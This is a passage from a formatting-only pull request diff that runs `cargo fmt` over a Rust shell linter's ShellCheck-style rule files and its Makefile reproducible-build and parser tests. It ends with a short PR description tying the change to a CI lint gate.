-});
+static PATTERN: std::sync::LazyLock<Regex> =
+    std::sync::LazyLock::new(|| Regex::new(r"\$\*").unwrap());
 
 pub fn check(source: &str) -> LintResult {
     let mut result = LintResult::new();

--- a/rash/src/linter/rules/sc2066.rs
+++ b/rash/src/linter/rules/sc2066.rs
@@ -33,9 +33,8 @@ use crate::linter::{Diagnostic, Fix, LintResult, Severity, Span};
 use regex::Regex;
 
 /// Check for unquoted variables in [[ ... ]] conditionals
-static BRACKET_PATTERN: std::sync::LazyLock<Regex> = std::sync::LazyLock::new(|| {
-    Regex::new(r"\[\[([^\]]+)\]\]").unwrap()
-});
+static BRACKET_PATTERN: std::sync::LazyLock<Regex> =
+    std::sync::LazyLock::new(|| Regex::new(r"\[\[([^\]]+)\]\]").unwrap());
 static SC2066_RE_1: std::sync::LazyLock<Regex> = std::sync::LazyLock::new(|| {
     Regex::new(r"\$(?:\{([A-Za-z_][A-Za-z0-9_]*)\}|([A-Za-z_][A-Za-z0-9_]*))").unwrap()
 });

--- a/rash/src/linter/rules/sc2068.rs
+++ b/rash/src/linter/rules/sc2068.rs
@@ -30,12 +30,10 @@ use crate::linter::{Diagnostic, Fix, LintResult, Severity, Span};
 use regex::Regex;
 
 /// Check for unquoted array expansions ($@, $*, ${array[@]}, ${array[*]})
-static SIMPLE_PATTERN: std::sync::LazyLock<Regex> = std::sync::LazyLock::new(|| {
-    Regex::new(r"\$[@*]").unwrap()
-});
-static ARRAY_PATTERN: std::sync::LazyLock<Regex> = std::sync::LazyLock::new(|| {
-    Regex::new(r"\$\{[a-zA-Z_][a-zA-Z0-9_]*\[[@*]\]\}").unwrap()
-});
+static SIMPLE_PATTERN: std::sync::LazyLock<Regex> =
+    std::sync::LazyLock::new(|| Regex::new(r"\$[@*]").unwrap());
+static ARRAY_PATTERN: std::sync::LazyLock<Regex> =
+    std::sync::LazyLock::new(|| Regex::new(r"\$\{[a-zA-Z_][a-zA-Z0-9_]*\[[@*]\]\}").unwrap());
 
 pub fn check(source: &str) -> LintResult {
     let mut result = LintResult::new();

--- a/rash/src/linter/rules/sc2070.rs
+++ b/rash/src/linter/rules/sc2070.rs
@@ -30,9 +30,8 @@ use crate::linter::{Diagnostic, Fix, LintResult, Severity, Span};
 use regex::Regex;
 
 /// Check for implicit string length tests that should use -n/-z
-static PATTERN: std::sync::LazyLock<Regex> = std::sync::LazyLock::new(|| {
-    Regex::new(r#"\[\s+("\$[A-Za-z_][A-Za-z0-9_]*")\s+\]"#).unwrap()
-});
+static PATTERN: std::sync::LazyLock<Regex> =
+    std::sync::LazyLock::new(|| Regex::new(r#"\[\s+("\$[A-Za-z_][A-Za-z0-9_]*")\s+\]"#).unwrap());
 
 pub fn check(source: &str) -> LintResult {
     let mut result = LintResult::new();

--- a/rash/src/linter/rules/sc2072.rs
+++ b/rash/src/linter/rules/sc2072.rs
@@ -29,12 +29,10 @@ use crate::linter::{Diagnostic, Fix, LintResult, Severity, Span};
 use regex::Regex;
 
 /// Check for decimal numbers in arithmetic contexts
-static ARITH_PATTERN: std::sync::LazyLock<Regex> = std::sync::LazyLock::new(|| {
-    Regex::new(r"\(\(([^)]+)\)\)").unwrap()
-});
-static DECIMAL_PATTERN: std::sync::LazyLock<Regex> = std::sync::LazyLock::new(|| {
-    Regex::new(r"\b\d+\.\d+\b").unwrap()
-});
+static ARITH_PATTERN: std::sync::LazyLock<Regex> =
+    std::sync::LazyLock::new(|| Regex::new(r"\(\(([^)]+)\)\)").unwrap());
+static DECIMAL_PATTERN: std::sync::LazyLock<Regex> =
+    std::sync::LazyLock::new(|| Regex::new(r"\b\d+\.\d+\b").unwrap());
 
 pub fn check(source: &str) -> LintResult {
     let mut result = LintResult::new();

--- a/rash/src/linter/rules/sc2076.rs
+++ b/rash/src/linter/rules/sc2076.rs
@@ -30,12 +30,10 @@ use crate::linter::{Diagnostic, Fix, LintResult, Severity, Span};
 use regex::Regex;
 
 /// Check for quoted regex patterns in =~ comparisons
-static BRACKET_PATTERN: std::sync::LazyLock<Regex> = std::sync::LazyLock::new(|| {
-    Regex::new(r"\[\[(.*?)\]\]").unwrap()
-});
-static REGEX_MATCH_PATTERN: std::sync::LazyLock<Regex> = std::sync::LazyLock::new(|| {
-    Regex::new(r#"=~\s+"([^"]+)""#).unwrap()
-});
+static BRACKET_PATTERN: std::sync::LazyLock<Regex> =
+    std::sync::LazyLock::new(|| Regex::new(r"\[\[(.*?)\]\]").unwrap());
+static REGEX_MATCH_PATTERN: std::sync::LazyLock<Regex> =
+    std::sync::LazyLock::new(|| Regex::new(r#"=~\s+"([^"]+)""#).unwrap());
 
 pub fn check(source: &str) -> LintResult {
     let mut result = LintResult::new();

--- a/rash/src/linter/rules/sc2162.rs
+++ b/rash/src/linter/rules/sc2162.rs
@@ -29,9 +29,8 @@ use crate::linter::{Diagnostic, Fix, LintResult, Severity, Span};
 use regex::Regex;
 
 /// Check for read without -r flag
-static PATTERN: std::sync::LazyLock<Regex> = std::sync::LazyLock::new(|| {
-    Regex::new(r"\bread\s+([A-Za-z_][A-Za-z0-9_]*)").unwrap()
-});
+static PATTERN: std::sync::LazyLock<Regex> =
+    std::sync::LazyLock::new(|| Regex::new(r"\bread\s+([A-Za-z_][A-Za-z0-9_]*)").unwrap());
 
 pub fn check(source: &str) -> LintResult {
     let mut result = LintResult::new();

--- a/rash/src/linter/rules/sc2164.rs
+++ b/rash/src/linter/rules/sc2164.rs
@@ -31,9 +31,8 @@ use crate::linter::{Diagnostic, Fix, LintResult, Severity, Span};
 use regex::Regex;
 
 /// Check for cd without error handling
-static PATTERN: std::sync::LazyLock<Regex> = std::sync::LazyLock::new(|| {
-    Regex::new(r"\bcd\s+([^\s;&|]+)").unwrap()
-});
+static PATTERN: std::sync::LazyLock<Regex> =
+    std::sync::LazyLock::new(|| Regex::new(r"\bcd\s+([^\s;&|]+)").unwrap());
 
 pub fn check(source: &str) -> LintResult {
     let mut result = LintResult::new();

--- a/rash/src/linter/rules/sc2178.rs
+++ b/rash/src/linter/rules/sc2178.rs
@@ -58,9 +58,8 @@ fn create_array_to_string_diagnostic(
 }
 
 /// Check for string assignment to array variable
-static ARRAY_DECL_PATTERN: std::sync::LazyLock<Regex> = std::sync::LazyLock::new(|| {
-    Regex::new(r"([A-Za-z_][A-Za-z0-9_]*)=\(").unwrap()
-});
+static ARRAY_DECL_PATTERN: std::sync::LazyLock<Regex> =
+    std::sync::LazyLock::new(|| Regex::new(r"([A-Za-z_][A-Za-z0-9_]*)=\(").unwrap());
 static SC2178_RE_1: std::sync::LazyLock<Regex> = std::sync::LazyLock::new(|| {
     Regex::new(r#"([A-Za-z_][A-Za-z0-9_]*)=(?:"[^"]*"|'[^']*'|[^\s;]+)"#).unwrap()
 });

--- a/rash/src/linter/rules/sc2190.rs
+++ b/rash/src/linter/rules/sc2190.rs
@@ -31,12 +31,10 @@ use crate::linter::{Diagnostic, LintResult, Severity, Span};
 use regex::Regex;
 
 /// Check for associative array without keys
-static ASSOC_DECL_PATTERN: std::sync::LazyLock<Regex> = std::sync::LazyLock::new(|| {
-    Regex::new(r"declare\s+-A\s+([A-Za-z_][A-Za-z0-9_]*)").unwrap()
-});
-static ARRAY_ASSIGN_PATTERN: std::sync::LazyLock<Regex> = std::sync::LazyLock::new(|| {
-    Regex::new(r"([A-Za-z_][A-Za-z0-9_]*)=\(([^)]+)\)").unwrap()
-});
+static ASSOC_DECL_PATTERN: std::sync::LazyLock<Regex> =
+    std::sync::LazyLock::new(|| Regex::new(r"declare\s+-A\s+([A-Za-z_][A-Za-z0-9_]*)").unwrap());
+static ARRAY_ASSIGN_PATTERN: std::sync::LazyLock<Regex> =
+    std::sync::LazyLock::new(|| Regex::new(r"([A-Za-z_][A-Za-z0-9_]*)=\(([^)]+)\)").unwrap());
 
 pub fn check(source: &str) -> LintResult {
     let mut result = LintResult::new();

--- a/rash/src/linter/rules/sc2191.rs
+++ b/rash/src/linter/rules/sc2191.rs
@@ -30,9 +30,8 @@ use crate::linter::{Diagnostic, Fix, LintResult, Severity, Span};
 use regex::Regex;
 
 /// Check for space between = and ( in array assignment
-static PATTERN: std::sync::LazyLock<Regex> = std::sync::LazyLock::new(|| {
-    Regex::new(r"([A-Za-z_][A-Za-z0-9_]*)=\s+\(").unwrap()
-});
+static PATTERN: std::sync::LazyLock<Regex> =
+    std::sync::LazyLock::new(|| Regex::new(r"([A-Za-z_][A-Za-z0-9_]*)=\s+\(").unwrap());
 
 pub fn check(source: &str) -> LintResult {
     let mut result = LintResult::new();

--- a/rash/src/linter/rules/sc2196.rs
+++ b/rash/src/linter/rules/sc2196.rs
@@ -31,12 +31,10 @@ use crate::linter::{Diagnostic, Fix, LintResult, Severity, Span};
 use regex::Regex;
 
 /// Check for deprecated egrep/fgrep commands
-static EGREP_PATTERN: std::sync::LazyLock<Regex> = std::sync::LazyLock::new(|| {
-    Regex::new(r"\begrep\b").unwrap()
-});
-static FGREP_PATTERN: std::sync::LazyLock<Regex> = std::sync::LazyLock::new(|| {
-    Regex::new(r"\bfgrep\b").unwrap()
-});
+static EGREP_PATTERN: std::sync::LazyLock<Regex> =
+    std::sync::LazyLock::new(|| Regex::new(r"\begrep\b").unwrap());
+static FGREP_PATTERN: std::sync::LazyLock<Regex> =
+    std::sync::LazyLock::new(|| Regex::new(r"\bfgrep\b").unwrap());
 
 pub fn check(source: &str) -> LintResult {
     let mut result = LintResult::new();

--- a/rash/src/make_parser/purify/purify_tests.rs
+++ b/rash/src/make_parser/purify/purify_tests.rs
@@ -466,10 +466,7 @@ fn test_purify_reproducible_comment_items_ignored() {
 #[test]
 fn test_purify_reproducible_git_log_without_date_not_flagged() {
     // git log without %cd or --date should NOT trigger
-    let ast = make_ast(vec![var(
-        "GIT_HASH",
-        "$(shell git log -1 --format=%H)",
-    )]);
+    let ast = make_ast(vec![var("GIT_HASH", "$(shell git log -1 --format=%H)")]);
     let result = reproducible_builds::analyze_reproducible_builds(&ast);
     assert!(
         !result.iter().any(

--- a/rash/src/make_parser/purify/tests.rs
+++ b/rash/src/make_parser/purify/tests.rs
@@ -1767,8 +1767,12 @@ fn test_reproducible_builds_date_in_variable() {
         result.len() >= 2,
         "Should detect timestamp and suggest SOURCE_DATE_EPOCH"
     );
-    assert!(result.iter().any(|t| matches!(t, Transformation::DetectTimestamp { .. })));
-    assert!(result.iter().any(|t| matches!(t, Transformation::SuggestSourceDateEpoch { .. })));
+    assert!(result
+        .iter()
+        .any(|t| matches!(t, Transformation::DetectTimestamp { .. })));
+    assert!(result
+        .iter()
+        .any(|t| matches!(t, Transformation::SuggestSourceDateEpoch { .. })));
 }
 
 #[test]
@@ -1784,7 +1788,9 @@ fn test_reproducible_builds_random_in_variable() {
     };
     let result = reproducible_builds::analyze_reproducible_builds(&ast);
     assert!(
-        result.iter().any(|t| matches!(t, Transformation::DetectRandom { .. })),
+        result
+            .iter()
+            .any(|t| matches!(t, Transformation::DetectRandom { .. })),
         "Should detect $$RANDOM"
     );
 }
@@ -1802,7 +1808,9 @@ fn test_reproducible_builds_process_id() {
     };
     let result = reproducible_builds::analyze_reproducible_builds(&ast);
     assert!(
-        result.iter().any(|t| matches!(t, Transformation::DetectProcessId { .. })),
+        result
+            .iter()
+            .any(|t| matches!(t, Transformation::DetectProcessId { .. })),
         "Should detect $$$$ (process ID)"
     );
 }
@@ -1820,7 +1828,9 @@ fn test_reproducible_builds_hostname() {
     };
     let result = reproducible_builds::analyze_reproducible_builds(&ast);
     assert!(
-        result.iter().any(|t| matches!(t, Transformation::DetectNonDeterministicCommand { .. })),
+        result
+            .iter()
+            .any(|t| matches!(t, Transformation::DetectNonDeterministicCommand { .. })),
         "Should detect hostname"
     );
 }
@@ -1838,7 +1848,9 @@ fn test_reproducible_builds_git_log_timestamp() {
     };
     let result = reproducible_builds::analyze_reproducible_builds(&ast);
     assert!(
-        result.iter().any(|t| matches!(t, Transformation::DetectNonDeterministicCommand { .. })),
+        result
+            .iter()
+            .any(|t| matches!(t, Transformation::DetectNonDeterministicCommand { .. })),
         "Should detect git log timestamp"
     );
 }
@@ -1858,7 +1870,9 @@ fn test_reproducible_builds_mktemp_in_recipe() {
     };
     let result = reproducible_builds::analyze_reproducible_builds(&ast);
     assert!(
-        result.iter().any(|t| matches!(t, Transformation::DetectNonDeterministicCommand { .. })),
+        result
+            .iter()
+            .any(|t| matches!(t, Transformation::DetectNonDeterministicCommand { .. })),
         "Should detect mktemp in recipe"
     );
 }

--- a/rash/src/services/parser_coverage_tests5.rs
+++ b/rash/src/services/parser_coverage_tests5.rs
@@ -25,7 +25,11 @@ use crate::services::parser::parse;
 
 fn parse_ok(code: &str) {
     let result = parse(code);
-    assert!(result.is_ok(), "Expected parse OK for code, got: {:?}", result.err());
+    assert!(
+        result.is_ok(),
+        "Expected parse OK for code, got: {:?}",
+        result.err()
+    );
 }
 
 fn parse_err(code: &str) {

--- a/rash/src/testing/mod.rs
+++ b/rash/src/testing/mod.rs
@@ -169,7 +169,8 @@ impl ExhaustiveTestHarness {
             let random_input = self.generate_random_input()?;
 
             // Test should not panic, but may return errors
-            let result = panic::catch_unwind(|| crate::transpile(&random_input, &Config::default()));
+            let result =
+                panic::catch_unwind(|| crate::transpile(&random_input, &Config::default()));
 
             match result {
                 Ok(_) => self.stats.passed_tests += 1,


### PR DESCRIPTION
## Summary
- Auto-formatted with `cargo fmt` (Rust 1.93.0)
- Prerequisite for unified CI lint gate deployment
- No functional changes — formatting only

## Context
Part of unified CI pipeline rollout ([spec](https://github.com/paiml/infra/blob/main/docs/specifications/unified-ci-pipeline.md)).
The lint gate requires `cargo fmt --check` to pass.

Generated with [Claude Code](https://claude.com/claude-code)